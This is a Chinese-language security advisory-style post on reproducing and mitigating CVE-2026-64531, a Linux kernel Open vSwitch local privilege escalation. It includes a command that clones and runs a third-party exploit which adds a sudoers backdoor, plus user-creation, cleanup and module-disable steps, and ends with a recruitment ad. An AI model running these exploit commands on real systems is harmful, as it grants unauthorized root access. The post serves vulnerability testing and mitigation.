复现与修复指南:Linux内核本地提权漏洞OVSwrap(CVE-2026-64531)
秀逗猫 2026-08-28 11:07 辽宁

CVE-2026-64531是Linux内核Open vSwitch(OVS)模块中的一个本地提权漏洞。该漏洞源于OVS在处理特定Netlink消息时对隧道元数据(Tunnel Metadata)的边界检查缺失,导致低权限用户可以通过构造恶意数据包触发堆缓冲区溢出,进而覆写内核关键数据结构,实现从普通用户到root的权限提升。
研究者技术博文:https://heyitsas.im/posts/ovswrap/
复现指南
此PoC基于内存破坏,成功利用后内核处于不稳定状态。reboot/shutdown等正常关机命令极大概率卡死在内核态清理阶段,仅能通过硬断电/强制重启恢复。请务必在测试环境或快照虚拟机中操作,严禁在生产环境执行。
创建新的低权限用户
useradd -s /bin/bash -m pseudo
echo pseudo:cat@md5 | chpasswd使用低权限用户登录ssh后,执行
git clone https://github.com/manizada/OVSwrap && cd OVSwrap && python3 ovswrap-poc.py执行一次成功后会自动将测试用户加入sudoers,即可通过sudo -i提权。
清除sudoers后门:
rm -rf /etc/sudoers.d/ovs_*修复指南
升级内核至包含该CVE修复补丁的版本。
临时缓解方案:
# 创建禁用配置文件
echo"install openvswitch /bin/false" | sudo tee /etc/modprobe.d/disable-openvswitch.conf结束
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析 长期招新
欢迎联系admin@chamd5.org
